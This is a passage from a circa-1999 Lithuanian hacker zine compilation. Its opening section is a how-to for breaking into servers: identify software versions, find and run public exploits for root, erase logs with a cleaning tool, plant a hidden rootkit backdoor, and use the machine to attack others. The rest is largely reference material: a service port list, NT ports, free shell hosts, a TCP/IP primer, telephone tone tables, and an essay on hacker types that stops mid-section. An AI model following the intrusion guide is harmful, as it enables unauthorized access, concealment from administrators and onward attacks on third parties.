-= Kaip nukepti serveri? =-Nera tikslaus algoritmo kaip nuhakinti serveri. Viskas priklauso nuo serverio konfiguracijos, serverio OS etc. As cia pabandziau pateikti keleta bendru hakinimo punktu:Suzinok kuo daugiau apie serveri: jo OS, programine iranda etc. Kaip suzinoti? Yra daug budu. Tarkim noorint suzinot ftp servo versija reikia su telnet prisijungti prie to servo per 21 porta. O sendmail versija – per 25 porta, pop – 110 etc. Bandykite susiieskoti esamam softui exploitu. Kur ieskoti? Visur: astalavista, bugtraq etc. Surade exploita susikompiliuokit ji ir panaudokit. Taip gausite root teisias. Dar pamenat taisykle: NEIKLIUK! ? Tad isvalyk is logu visu info apie tave. Logai gali buti ne tik standartiniai, bet uzslepti etc. Tad galima prie ju uzsikasti. Is http://packetstorm.securify.com galite pasiimti paketa vanish ar pan., kuris pats automatiskai pravalo logus (negarantuojama 100%). O ka, kita karta vel ta pati? Nea. Tam yra toks dalykas BackDoor (ju pilnas inetas, rekomendoju rootkit is http://packetstorm.securify.com). Pasidaryk atsargini iejima. Tiesa, ji reikia gerai pakavoti, nes jei ji suseks tai viskas nais suniui ant uodegos. Daba jau gali daryti su servu ka nori: hakinti kitus servus is jo, imti reikalinga info etc. Is tikro hakinimas gali skirtis labai nuo situ isvardintu punktu. Bet visuomet lieka ta pacia ideja: Visos programos turi bugus, kurias turi kaskas gi pasinaudoti. Galima atrasti silpna CGI vieta, klaida filtruojant tuos zymiuosius JavaScript ir pan. Svarbiausia tokiems dalykams reikia geros vaizduotes ir geru minciu, reikia zinoti kokiu principu veikia vienoks ar kitoks softas, kurio bugu deka hakinate.

45. Servisai

Servisai ir ju portai bei protokolaiKartais reikia zinoti kosk servisas naudoja koki porta. Is tikro galima paciam rankiniu budu pakeisti porto numeri,bet lamos adminai to nedaro. Jie palieka porta pagal nutylejima (default port). Tad cia pateikiu servisu sarasa, ju naudojama protokola ir ju default porta.Tiems kas naudoja kokia tai UNIX seimos operacinia sitema tai nera aktualu. Didzia dali sio saraso galima rasti /etc/services

# /etc/services:# $Id: services,v 1.4 1997/05/20 19:41:21 tobias Exp $## Network services, Internet style## Note that it is presently the policy of IANA to assign a single well-known# port number for both TCP and UDP; hence, most entries here have two entries# even if the protocol doesn’t support UDP operations.# Updated from RFC 1700, “Assigned Numbers” (October 1994). Not all ports# are included, only the most common ones.#tcpmux1/tcp# TCP port service multiplexerecho7/tcpecho7/udpdiscard9/tcpsink nulldiscard9/udpsink nullsystat11/tcpusersdaytime13/tcpdaytime13/udpnetstat15/tcpqotd17/tcpquotemsp18/tcp# message send protocolmsp18/udp# message send protocolahargen19/tcpttytst sourcecaargen19/udpttytst sourceftp-data20/tcpftp21/tcpfsp21/udpfspdssh22/tcp# SSH Remote Login Protocolssh22/udp# SSH Remote Login Protocoltelnet23/tcp# 24 – privatesmtp25/tcpmail# 26 – unassignedtime37/tcptimservertime37/udptimserverrlp39/udpresource# resource locationnameserver42/tcpname# IEN 116whois43/tcpnicnamere-mail-ck50/tcp# Remote Mail Checking Protocolre-mail-ck50/udp# Remote Mail Checking Protocoldomain53/tcpnameserver# name-domain serverdomain53/udpnameservermtp57/tcp# deprecatedbootps67/tcp# BOOTP serverbootps67/udpbootpc68/tcp# BOOTP clientbootpc68/udptftp69/udpgopher70/tcp# Internet Gophergopher70/udprje77/tcpnetrjsfinger79/tcpwww80/tcphttp# WorldWideWeb HTTPwww80/udp# HyperText Transfer Protocollink87/tcpttylinkkerberos88/tcpkerberos5 krb5# Kerberos v5kerberos88/udpkerberos5 krb5# Kerberos v5supdup95/tcp# 100 – reservedhostnames101/tcphostname# usually from sri-niciso-tsap102/tcptsap# part of ISODE.csnet-ns105/tcpcso-ns# also used by CSO name servercsnet-ns105/udpcso-ns## unfortunately the poppassd (Eudora) uses a port which has already# been assigned to a different service. We list the poppassd as an# alias here. This should work for programs asking for this service.# (due to a bug in inetd the 3com-tsmux line is disabled)##3com-tsmux106/tcppoppassd#3com-tsmux106/udppoppassdrtelnet107/tcp# Remote Telnetrtelnet107/udppop-2109/tcppostoffice# POP version 2pop-2109/udppop-3110/tcp# POP version 3pop-3110/udpsunrpc111/tcpportmapper# RPC 4.0 portmapper TCPsunrpc111/udpportmapper# RPC 4.0 portmapper UDPauth113/tcpauthentication tap identsftp115/tcpuucp-path117/tcpnntp119/tcpreadnews untp# USENET News Transfer Protocolntp123/tcpntp123/udp# Network Time Protocolnetbios-ns137/tcp# NETBIOS Name Servicenetbios-ns137/udpnetbios-dgm138/tcp# NETBIOS Datagram Servicenetbios-dgm138/udpnetbios-ssn139/tcp# NETBIOS session servicenetbios-ssn139/udpimap2143/tcpimap# Interim Mail Access Proto v2imap2143/udpimapsnmp161/udp# Simple Net Mgmt Protosnmp-trap162/udpsnmptrap# Traps for SNMPcmip-man163/tcp# ISO mgmt over IP (CMOT)cmip-man163/udpcmip-agent164/tcpcmip-agent164/udpxdmcp177/tcp# X Display Mgr. Control Protoxdmcp177/udpnextstep178/tcpNeXTStep NextStep# NeXTStep windownextstep178/udpNeXTStep NextStep# serverbgp179/tcp# Border Gateway Proto.bgp179/udpprospero191/tcp# Cliff Neuman’s Prosperoprospero191/udpirc194/tcp# Internet Relay Chatirc194/udpsmux199/tcp# SNMP Unix Multiplexersmux199/udpat-rtmp201/tcp# AppleTalk routingat-rtmp201/udpat-nbp202/tcp# AppleTalk name bindingat-nbp202/udpat-echo204/tcp# AppleTalk echoat-echo204/udpat-zis206/tcp# AppleTalk zone informationat-zis206/udpqmtp209/tcp# The Quick Mail Transfer Protocolqmtp209/udp# The Quick Mail Transfer Protocolz3950210/tcpwais# NISO Z39.50 databasez3950210/udpwaisipx213/tcp# IPXipx213/udpimap3220/tcp# Interactive Mail Accessimap3220/udp# Protocol v3rpc2portmap369/tcprpc2portmap369/udp# Coda portmappercodaauth2370/tcpcodaauth2370/udp# Coda authentication serverulistserv372/tcp# UNIX Listservulistserv372/udphttps443/tcp# MComhttps443/udp# MComsnpp444/tcp# Simple Network Paging Protocolsnpp444/udp# Simple Network Paging Protocolsaft487/tcp# Simple Asynchronous File Transfersaft487/udp# Simple Asynchronous File Transfernpmp-local610/tcpdqs313_qmaster# npmp-local / DQSnpmp-local610/udpdqs313_qmaster# npmp-local / DQSnpmp-gui611/tcpdqs313_execd# npmp-gui / DQSnpmp-gui611/udpdqs313_execd# npmp-gui / DQShmmp-ind612/tcpdqs313_intercell# HMMP Indication / DQShmmp-ind612/udpdqs313_intercell# HMMP Indication / DQS#-= UNIX specific services =-#exec512/tcpbiff512/udpcomsatlogin513/tcpwho513/udpwhodshell514/tcpcmd# no passwords usedsyslog514/udpprinter515/tcpspooler# line printer spoolertalk517/udpntalk518/udproute520/udprouter routed# RIPtimed525/udptimeservertempo526/tcpnewdatecourier530/tcprpcconference531/tcpchatnetnews532/tcpreadnewsnetwall533/udp# -for emergency broadcastsuucp540/tcpuucpd# uucp daemonafpovertcp548/tcp# AFP over TCPafpovertcp548/udp# AFP over TCPremotefs556/tcprfs_server rfs# Brunhoff remote filesystemklogin543/tcp# Kerberized `rlogin’ (v5)kshell544/tcpkrcmd# Kerberized `rsh’ (v5)kerberos-adm749/tcp# Kerberos `kadmin’ (v5)#webster765/tcp# Network dictionarywebster765/udp## From “Assigned Numbers”:##> The Registered Ports are not controlled by the IANA and on most systems#> can be used by ordinary user processes or programs executed by ordinary#> users.##> Ports are used in the TCP [45,106] to name the ends of logical#> connections which carry long term conversations. For the purpose of#> providing services to unknown callers, a service contact port is#> defined. This list specifies the port used by the server process as its#> contact port. While the IANA can not control uses of these ports it#> does register or list uses of these ports as a convienence to the#> community.#ingreslock1524/tcpingreslock1524/udpprospero-np1525/tcp# Prospero non-privilegedprospero-np1525/udpdatametrics1645/tcpold-radius# datametrics / old radius entrydatametrics1645/udpold-radius# datametrics / old radius entrysa-msg-port1646/tcpold-radacct# sa-msg-port / old radacct entrysa-msg-port1646/udpold-radacct# sa-msg-port / old radacct entryradius1812/tcp# Radiusradius1812/udp# Radiusradacct1813/tcp# Radius Accountingradacct1813/udp# Radius Accountingcvspserver2401/tcp# CVS client/server operationscvspserver2401/udp# CVS client/server operationsvenus2430/tcp# codacon portvenus2430/udp# Venus callback/wbc interfacevenus-se2431/tcp# tcp side effectsvenus-se2431/udp# udp sftp side effectcodasrv2432/tcp# not usedcodasrv2432/udp# server portcodasrv-se2433/tcp# tcp side effectscodasrv-se2433/udp# udp sftp side effectmysql3306/tcp# MySQLmysql3306/udp# MySQLrfe5002/tcp# Radio Free Ethernetrfe5002/udp# Actually uses UDP onlycfengine5308/tcp# CFenginecfengine5308/udp# CFenginebbs7000/tcp# BBS service## Kerberos (Project Athena/MIT) services# Note that these are for Kerberos v4, and are unofficial. Sites running# v4 should uncomment these and comment out the v5 entries above.#kerberos4750/udpkerberos-iv kdc# Kerberos (server) udpkerberos4750/tcpkerberos-iv kdc# Kerberos (server) tcpkerberos_master751/udp# Kerberos authenticationkerberos_master751/tcp# Kerberos authenticationpasswd_server752/udp# Kerberos passwd serverkrb_prop754/tcp# Kerberos slave propagationkrbupdate760/tcpkreg# Kerberos registrationkpasswd761/tcpkpwd# Kerberos “passwd”kpop1109/tcp# Pop with Kerberosknetd2053/tcp# Kerberos de-multiplexorzephyr-srv2102/udp# Zephyr serverzephyr-clt2103/udp# Zephyr serv-hm connectionzephyr-hm2104/udp# Zephyr hostmanagereklogin2105/tcp# Kerberos encrypted rlogin## Unofficial but necessary (for NetBSD) services#supfilesrv871/tcp# SUP serversupfiledbg1127/tcp# SUP debugging## Datagram Delivery Protocol services#rtmp1/ddp# Routing Table Maintenance Protocolnbp2/ddp# Name Binding Protocolecho4/ddp# AppleTalk Echo Protocolzip6/ddp# Zone Information Protocol## Services added for the Debian GNU/Linux distribution#poppassd106/tcp# Eudorapoppassd106/udp# Eudoramailq174/tcp# Mailer transport queue for Zmailermailq174/tcp# Mailer transport queue for Zmailerssmtp465/tcp# SMTP over SSLgdomap538/tcp# GNUstep distributed objectsgdomap538/udp# GNUstep distributed objectssnews563/tcp# NNTP over SSLssl-ldap636/tcp# LDAP over SSLomirr808/tcpomirrd# online mirroromirr808/udpomirrd# online mirrorrsync873/tcp# rsyncrsync873/udp# rsyncsimap 993/tcp# IMAP over SSLspop3995/tcp# POP-3 over SSLsocks1080/tcp# socks proxy serversocks1080/udp# socks proxy serverrmtcfg1236/tcp# Gracilis Packeten remote config serverxtel1313/tcp# french minitelsupport1529/tcp# GNATScfinger2003/tcp# GNU Fingerninstall2150/tcp# ninstall serviceninstall2150/udp# ninstall serviceafbackup2988/tcp# Afbackup systemafbackup2988/udp# Afbackup systemicp3130/tcp# Internet Cache Protocol (Squid)icp3130/udp# Internet Cache Protocol (Squid)postgres5432/tcp# POSTGRESpostgres5432/udp# POSTGRESfax4557/tcp# FAX transmission service (old)hylafax4559/tcp# HylaFAX client-server protocol (new)noclog5354/tcp# noclogd with TCP (nocol)noclog5354/udp# noclogd with UDP (nocol)hostmon5355/tcp# hostmon uses TCP (nocol)hostmon5355/udp# hostmon uses TCP (nocol)ircd6667/tcp# Internet Relay Chatircd6667/udp# Internet Relay Chatwebcache8080/tcp# WWW caching servicewebcache8080/udp# WWW caching servicetproxy8081/tcp# Transparent Proxytproxy8081/udp# Transparent Proxymandelspawn9359/udpmandelbrot# network mandelbrotamanda10080/udp# amanda backup serviceskamanda10081/tcp# amanda backup services (Kerberos)kamanda10081/udp# amanda backup services (Kerberos)amandaidx10082/tcp# amanda backup servicesamidxtape10083/tcp# amanda backup servicesisdnlog20011/tcp# isdn logging systemisdnlog20011/udp# isdn logging systemvboxd20012/tcp# voice box systemvboxd20012/udp# voice box systembinkp24554/tcp# Binkleybinkp24554/udp# Binkleyasp27374/tcp# Address Search Protocolasp27374/udp# Address Search Protocoltfido60177/tcp# Ifmailtfido60177/udp# Ifmailfido60179/tcp# Ifmailfido60179/udp# Ifmail# Local serviceslinuxconf 98/tcpswat 901/tcp # Add swat service used via inetd

-= NT specifiniai portai: =-

Ne visi serveriai stovi ant UNIX sistemu. Daugelis stovi ir ant NT. Kaip zinia NT dauguma servisu poru skirtingi negu UNIX.Tad cia pateikiu NT portus ir protokolus.

-= Open Service Ports =-Windows NT Functionality UDP TCP IP

Browsing 137,138DHCP Lease 67,68DHCP Manager 135DNS Administration 139DNS Resolution 53File Sharing 139Logon Sequence 137,138 139NetLogon 138NT Diagnostics 139NT Directory Replication 138 139NT Event Viewer 139NT Performance Monitor 139NT Registry Editor 139NT Secure Channel 137,138 139NT Server Manager 139NT Trusts 137,138 139NT User Manager 139Pass Through Validation 137,138 139PPTP 1723 47Printing 137,138 139WINS Manager 135WINS Registration 137WINS Replication 42————————————————————————Exchange Functionality

Client/Server Comm. 135Exchange Administrator 135IMAP 143LDAP 389LDAP (SSL) 636MTA – X.400 over TCP/IP 102POP3 110RPC 135SMTP 25

46. Shell dykai

-=Turinys=-

-=1. Kas yra shell?=--=2. Kur galima gauti shell uz dyka?=-

-=1. Kas yra shell?=-

Shell yra komandu interpretatorius, kuris vercia jusu komandas i suprantamas operaciniai sistemai komandas. Dazniausiai kai apie shell kalbama, turima galvoje *NIX shell (bash, sh etc). Is tikro ir windows turi shell. Jis yra command.com.Su shell galimi tokie veiskmai: failu, katalogu tvarkymas, failu vykymas, redagavimas, kurimas, isnaudoti savo hardware.

-=2. Kur galima gauti shell uz dyka?=-

Cia pateikiu trumpa sarasa kur galima gauti shell uz dyka bei trumpa to shell aprasyma.

http://www.Linuxshell.orgDuoda nemokama Linux Shell akaunta, www vietos (5MB) ir POP3 email.

http://www.ShellYeah.orgLeidzia IRC (IRC-II Epic arba Bitch), Pine e-mail`ui, USENET Tin, ICQ su Micq.Shell`as sedi po unix, galite naudot arba Bash arba Tcsh interpretatoriu ir kurti shell scenarijus (skriptus).

http://www.DucTape.netUNIX sistemos shell. Leidzia naudotis IMAP Email ir keleta kitu servisu.

http://www.Freeshells.netPine, Pico, IRC (bX ir ircII client),Bash shell, lynx, PERL ir .cgi!

http://www.NYX.netDuoda nemokama UNIX shell.

http://www.Nether.NetLinux Box shell`as.

http://www.Arbornet.org/Projects.htmlM-Net yra “America’s First Public Access UNIX System.” Kad prisjungtumet prie M-Net,rasykite : telnet m-net.arbornet.org. Kad sukurtumete nauja acounta iveskite login dalyje: “prompt”. Leidzia naudotis e-mail,lynx, ftp, IRC, kompiletoriais. Leidzia tureti www puslapi.

Jugbonehttp://www.jugbone.cxJugbone yra standartinis UNIX shell ir leidzia naudotis kompiletoriais, IRC kliantais, pastu etc.

47. TCP/IP totorial`as

Internetas- didziausias pasaulio globalusis tinklas.TCP/IP yra protokolas (tiksliau protokolu rinkinys) jungiantis daug kompiuteriu ir uztikrinanis gera duomenu perdavimo kokybe etc.TCP/IP susideda is dag protokolu:

TCP (Transmission Control Protocol) – protokolas, orientuotas i susijungimus, kuris garantuoja patikima baitu srauto perdavima tarp dvieju sistemu.

UDP (User Datagram Protocol) – protokolas skirtas vartotojiskiems procesams, dirbantis be susijungimo patikrinimo. Priesingai nei TCP, kuris priklausopatikimiems protokolams, nera garantijos, kad UDP pasiusti duomenys pasieks adresata.

ICMP (Internet Control Message Protocol) protokolas palaiko informacijos apie klaidas perdavima ir valdo informacija tarp tinklo sliuzu ir mazgu. ICMP pranesimai generuojami ir apdorojami Interneto programine iranga, o ne vartotojiskais procesais. IP (Internet protocol) – protokolas tarnaujantis duomenu paketu persiuntimui TCP, UDP ir ICMP protokolams. IP aptarnauja kompiuteriu susijungimus, naudojant taip vadinama IP adresacija.

ARP (Adress Resoliution Protocol) – sis protokolas pavercia Interneto adresa i irenginio adresa (pavyzdziui, kanalu (Data Link) lygyje Ethernet tipo irenginiui).

RARP (Reverse Adress Resoliution Protocol) – pavercia irenginio adresa i Interneto adresa.

FTP (File Transfer Protocol) aptarnauja failu perdavima TCPprotokolu. Apie FTP yra atskiras straipsnis (ziureti virsuj arba spausti cia).

TELNET (Remote Login). Sis protokolas leidzia terminalu prisijungti prie nutolusios sistemos.

SMPT (Simple Mail Transfer Protocol) – TCP protokolo pagalba suteikia galimybe siusti elektronini pasta DNS (Domain Name Service) – aptarnauja simbolinio adresoInterneto adresu pavertima.

NFS (Network File System) protokolas suteikia galimybe tvarkyti nutolusio kompiuterio failus.

-=Kas yra IP adresas?=-

IP adresas tai unikalus adresas atitinkantis tam fizini objekta (kompiuteri, roiteri). Kiekvienas kompiuteris prie Interneto jungiasi unikaliu IP adresu.

-=Kokie yra IP adresu tipai?=-

Kiekvienas kompiuteris TCP/IP tinkle turi triju lygiu adresus:

fizinis (MAC adresas)tinklinis (IP adresas)simbolinis (DNS vardas)

-=Kas yra MAC tipo adresas?=-

MAC tinklinio adapterio adresas arba marsrutizatoriaus portas, pavyzdziui, 11-A0-17-3D-BC-01. Siuos adresus nustato gamintojai ir be to jie yra unikalus, nes yra centralizuotai valdomi. MAC adresai turi 6 Baitu formato: vyresnieji 3 baitai – gamintojo kodas, o mazesnieji 3 baitai nustatomi gamintoju tam tikru budu. Globalus tinklai, tokie kaip X.25 arba Frame Relay, lokalu adresa nustato tinklo administratorius.

-=Kas yra IP tipo adresas?=-

IP – adresas, kuri sudaro 4 baitai, pavyzdziui, 109.26.17.100. Sis adresas naudojamas tinkle. Ji nustato administratorius, kompiuterio ir marsrutizatoriu konfiguravimo metu. IP adresas susideda is dvieju daliu: tinlo ir mazgo numerio. Tinklo numeris gali buti parinktas administratoriaus, arba pagal specialios organizacijos, Network Information Center (NIC) rekomendacijas, kai tinklas turi dirbti kaip Interneto dalis.

Daznai Interneto paslaugu tiekejai (provaiders) gauna tam tikru adresu intervala is NIC organizacijos, o po to paskirsto juos savo abonentams. Mazgo numeris IP adrese nustatomas nepriklausant lokalaus adreso mazgui. IP adreso dalinimas i dvi dalis yra lankstus, ir ribas tarp siu lauku galima nustatyti labai paprastai. Mazgas gali ieiti i kelis IP tinklus. Tokiu atveju mazgas turi tureti kelis IP adresus, pagal tinklu skaiciu. Taigi IP adresas nusako ne atskira kompiuteri arba marsrutizatoriu, bet viena tinlini sujungima.

-=Kas yra DNS tipo adresas?=-

Simbolinis identifikatorius-vardas (DNS), pavyzdziui SERV1.COM. Si adresa sukuria administratorius ir ji sudaro kelios dalys, pavyzdziui kompiuterio vardas, organizacijos pavadinimas, domenas. DNS yra naudojamas programiniame lygyje,pavyzdziui FTP ir TELENT protokoluose.

-=Kaip vaizduojamas IP adresas?=-

IP adreso dydis 4 baitai ir daznaiusiai yra uzrasomas keturiu skaiciu seka, kurioje kievienas baitas yra desimtaineje formoje ir atskiriamas vienas nuo kito taskais. 128.10.2.30 – tradicine adreso vaizdavimo forma desimtaineje sistemoje. 10000000 00001010 00000010 00011110 – adresas, dvejetaineje sistemoje.

-=Kaip sudaromas IP adresas?=-

Adresa sudaro dvi logines dalys – tinklo numeris ir mazgo numeris tinkle. Kokia dalis adreso priklauso tinklo numeriui, o kokia dalis mazgo numeriui, nustatoma pagal pirmus adreso bitus.

I kokias klases skirstomi TCP/IP adresai?

Jei adreso pirmas bitas yra 0, tai tinklas priklauso A klasei, ir tinklo numeris uzima 1 baita, mazgo numeris – 3 baitus. A klases tinklo skaicius yra intervale nuo 1 iki 126. Skaicius 0 nenaudojamas, o skaicius 127 rezervuotas specialiems tikslams.

Jei adreso pirmi du bitai lygus 10, tai tinklas priklauso B klasei ir yra vidutiniu tinklu dydzio. B klases tinklo adresui ir mazgo adresui skiriami 16 bitu, tai yra po 2 baitus.

Jei adresas prasideda skaiciu seka 110, tai jis priklauso C klases tinklui. Tinklo adresui skiriami 24 bitai, o mazgo adresui 8 bitai.

Jei adresas prasideda seka 1110, tai jis priklauso D klasei ir yra ypatingas, vadinamas MULTICAST. Jei duomenu pakete adresas priklauso D klasei, tai toki paketa turi gauti visi mazgai, kurie priskirti duotam adresui.

Jei adresas prasideda 11110, tai jis priklauso E klasei ir yra rezervuotas ateiciai.

Kokiai klasei priklauso tam tikras adresas?

Klase Mazausias adresas Didziausias adresas

A 0.1.0.0 126.0.0.0

B 128.0.0.0 191.255.0.0

C 192.0.1.0 223.255.255.0

D 224.0.0.0 239.255.255.255

E 240.0.0.0 247.255.255.255

-=Kas yra marsrutizacija?=-

Kiekvienas paketas, einantis per tinkla turi gavejo adresa, ir yra siunciamas pagal numatytas marsrutizacijos taisykles.

Marsrutizavimas – tai duomenu paketo siuntimas per tinkla labirintus, esancius tarp saltinio ir adresato.

-=Kokie yra specialus IP adresai?=-

Jei IP adresa sudaro tik nuliai dvejetaineje sistemoje, tai jis nurodo adresa to mazgo, kuris sugeneravo si paketa. (0.0.0.0)

Jei tinklo skaiciu lauke yra nuliai (0000..000, Mazgo numeris), tai pagal nutylejima skaitoma, kad sis mazgas priklauso tam paciam tinklui, kaip ir mazgas, kuris nusiunte paketa. (pvz.: 0.0.0.1)

Jei visi IP adresai dvejetaineje sistemoje yra 1, tai paketas su tokiu tikslo adresu privalo buti issiustas visiems mazgams, esantiems siame tinkle, kaip ir paketo saltinis. Toks siuntimas vadinamas LIMITED BROADCAST.

Jei mazgo lauke dvejetaineje sistemoje yra vienetai (Tinklo numeris, 111..111), tai paketas turintis toki adresa yra siunciamas visiems tinklo mazgams su uzduotu numeriu. Tai vadinama BROADCAST.

Adresas 127.0.0.1 rezervuotas atgalinio rysio organizavimui, testuojant programine iranga nesiunciant duomenu paketo i tinkla. Jis vadinamas LOOPBACK.

IP adresas priklausantis D klasei (MULTICAST) reiskia, kad paketas turi buti issiustas iskarto keliems mazgams, nurodytiems adreso lauke. Mazgai patys save nustato, kuriai grupei jie priklauso. Vienas ir tas pats mazgas gali ieiti i kelias grupes. Tokie pranesimai vadinami MULTICAST. Grupinis adresas nera dalinamas i tinklo ir mazgo laukus. Jis apdorojamas ypatingu budu marsrutizatoriaus.

-=Kaip nustatomas IP adresas?=-

IP protokole, t.y. kompiuterio adresas arba marsrutizatoriaus portas, nustatomas tinklo administratoriaus ir jis nera tiesiogiai susijes su lokaliu adresu, kaip tai padaryta IPX protokole.

-=Kas yra DNS?=-

DNS (Domain Name System) – tai duomenu baze, palaikanti hierarchine sistema Internete. DNS tarnyba skirta automatinei IP adreso paieskai zinant simbolini mazgo varda.

-=Kas yra domenas?=-

Domenas – tai simbolinio DNS vardo priesaga, pvz; .lt.Domeno vardas gali buti iki 63 simboliu. Kiekvienas kompiuteris Internete turi savo pilna domeno varda (fully qualified domain name, FQDN).

-=Kas yra DNS serveris ir klientas?=-

DNS yra pagalbinis protokolas. Jis nera simetriskas nes jame nustatyti DNS serveriai ir DNS klientai. DNS serveriai laiko dali duomenu bazes apie simbolinius IP adresu vardus. Si duomene baze paskirstyta pagal Interneto administracinius domenus. DNS klientai zino administracinio domeno, DNS serverio, IP adresa ir IP protokolo pagalba perduoda uzklausa, kurioje pranesa simbolini varda ir praso grazinti IP adresa.

Jei duomenys apie uzklausa laikomi DNS serverio duomenu bazeje, tai jis is karto pasiuncia atsakymu klientui, jei ne – serveris siuncia uzklausa kitam domeno DNS serveriui, kuris arba pats apdoroja uzklausa arba persiuncia ji kitam serveriui. Visi DNS serveriai yra sujungti hierarchiskai, priklausomai nuo domeno tinklo hierarchijos Internete.

-=Kas yra DHCP protokolas?=-

Kaip jau buvo mineta, IP adresas gali buti paskirtas tinklo administratoriaus. Tai uzima daug laiko. Problema yra ir vartotojai, mazai zinantys apie kompiuterio konfiguravimo, tad visos bedos tenka administratoriui.

Dynamic Host Configuration Protocol (DHCP) buvo sukurtas tam, kad palengvintu administratoriu darba. Pagrinidinis sio protokolo tikslas yra dinaminis IP adresu paskyrimas. Taip pat jis palaiko rankini ir automatini statinii adresu paskyrima.

Dinaminis adresu paskirstymas leidzia kurti IP tinkla, kuriame mazgu skaicius virsija esama skaiciu IP adrese. DHCP yra patikimas ir paprastas TCP/IP tinklo konfiguratorius, garantuojantis, kad nebus vienodu adresu.

48. TONINIAI SIGNALAI TELEFONIJOJE

Parenge: ww0lf1999/09

Telefonijoje naudojami du pagrindiniai toniniu signalu tipai: DTMF ir MKTTAbu shie standartai naudoja dvieju tonu signala, t. y. signalas susidedaish dvieju zhymiai besiskiriancziu garso dazhniu. Didesnio dazhnio signaloamplitude yra proporcinga mazhesnio dazhnio signalo einamajai reikshmei.

DTMF standartas

DTMF (Dual Tone Multiple Frequency) yra dazhniu rinkinys “2 ish 8”. Jisnaudojamas renkant numeri vadinamu toniniu rinkimu. Kiekvienas signalassusideda ish dazhniu, kurie yra dvieju grupiu:

Zhemesniosios grupes dazhniai: 697 Hz, 770 Hz, 852 Hz, 941 Hz;

Aukshtesniosios grupes dazhniai: 1209 Hz, 1336 Hz, 1477 Hz, 1633 Hz;

Toks kodas uzhtikrina 16 signaliniu dazhniu kombinaciju, 10 ish kuriunaudojamos renkant numeri. Mygtukai # ir * naudojami renkant papildomupaslaugu kodus, o mygtukai A, B, C, D naudojami ishplestineje klaviaturoje.Dvieju dazhniu signalo siuntimas turi trukti ne trumpiau 40 ms, pauzes – netrumpiau 26 ms. Dazhniu stabilumas – ne prascziau kaip 1.6 %

DTMF standarto signalai:

Dazhnis 1209 Hz 1336 Hz 1477 Hz 1633 Hz

697 Hz 1 2 3 A

770 Hz 4 5 6 B

852 Hz 7 8 9 C

941 Hz * 0 # D

MKTT standartas

Shio standarto signalai – dazhniu rinkinys “2 ish 6” ir yra labiausiaizhinomi ish automatinio numerio nustatymo aparaturos. Ish ju formuojamastoninis ATS atsakymas, tacziau “beintervaliniai paketai” – ne vieninteleshiu signalu panaudojimo sritis. Jie taip pat naudojami ir po vienasignalizacijai tarp telefono stocziu.

Skirtingai nei DTMF, visi MKTT dazhniai 700, 900, 1100, 1300, 1500, 1700 Hzyra lygiateisiai ir gali buti bet kokioje kombinacijoje (aishku ishskirusvienodas), tokiu budu yra 15 imanomu toniniu signalu.

MKTT standarto signalai:

Dazhnis, Hz 700 900 1100 1300 1500 1700

700 N

900 “1” N

1100 “2” “3” N

1300 “4” “5” “6” N

1500 “7” “8” “9” “0” N

1700 – – Begin Repeat – N

P.S.

Komentaru ir pasiulymu laukiu adresu ww0lf@pogrindis.netGal kas gali parashyti koki ishsamu failiuka apie tonine signalizacijatarp ATS Lietuvos Telekomo tinkluose? 🙂 Taip pat bucziau dekingas uzh bet kokia info apie Lietuvos Telekomo tinklus ir ATS

Knowledge is power! ww0lf

49. Technologinio andegraundo atstovu tipologija

MG, 1999, Kaunas

I. Ivadas

Gyvename technikos amzhiuje. Visos gyvenimo sritys tampa vis labiaukompiuterizuotos, automatizuotos bei technologizuotos. Tai, be abejo, daromusu gyvenima patogesni, didina darbo nashuma ir skatina progresa. Tacziaune paslaptis, kad technologijos pasiekimais sekmingai naudojasi irkriminalinis pasaulis. Nusikaltimams ivykdyti yra panaudojama moderniausiatechnika, samdomi specialistai, netgi atliekami tirinejimai.

Tacziau ne tik nusikalstamojo pasaulio atstovai gadina gyvenima doriemsmusu kompiuterizuotos visuomenes nariams. Yra zhmoniu, kurie tai daro ishidejos: kovodami uzh savo isitikinimus, “griaudami Sistema”, arba tiesiogtodel, kad jiems tai patinka. Kiberpankai, kompiuteriniai anarchistai irtechnologiniai chuliganai… Juos ir turesime omeny kalbedami apie margatechnologini pogrindi.

II.Tipologija

1. Hackeriai

Hackeriai – tai bene zhinomiausia technologinio pogrindzhio atstovugrupe. Del paties zhodzhio “hacker” pradines reikshmes net dabar yradiskutuojama. Vienas ish variantu – kad jis reishke meistra, kirviugaminanti baldus. Taciau shio zhodzhio naudojimo jo dabartine prasmepradzhios reiktu ieshkoti JAV Masacziusetso Technologiniame Universitete.7-ame deshimtmetyje, pacioje kompiuteriu eros pradzhioje hackeriais emevadinti kietus “programerius”, kuriems nepakako tiesiog vartotoju igudzhiu,kurie gilinosi i paczius kompiuterio veikimo principus ir jaute malonumaprogramuodami. Veliau, kai atsirado kompiuteriu tinklai, galimybe pasiektikita kompiuteri per atstuma, atsirado ir pirmi kompiuteriniai nusikaltimai.Kadangi tokio pobudzhio veiklai reikejo atitinkamu zhiniu, hackeriussusiejo (ir ne be pagrindo) su shiais “isilauzhimais”. O veliau jau spaudaprisidejo prie hackerio, kaip piktojo kompiuterijos genijaus ivaizdzhioformavimo.

Tai kas gi vis delto yra hackeris? Apibendrindami galime pasakyti, kadtai aukshto lygio kompiuterines technikos (kaip hardo taip ir softo) irkompiuteriniu tinklu specialistas, zhinantis keleta programavimo kalbu,turintis nestandartini mastyma ir gera humoro jausma. Hackeriuikompiuteris – tai ne tik darbas ar hobis. Jam tai – gyvenimo budas. …Specializacijos prasme hackeris – tai kompiuteriniu tinklu beinesankcionuoto patekimo i ishskirstytas informacines sistemas specialistas.Tacziau pilnavercziu hackeriu galima vadinti tik ta, kuris savarankishkaiigyvendina 3 isilauzhimo i sistema pakopas: sistemos analize ir jospazheidzhiamumu pajieshka, programine atakos realizacija, ir pagaliau patspatekimas i apsaugota sistema.

2. Phreakeriai

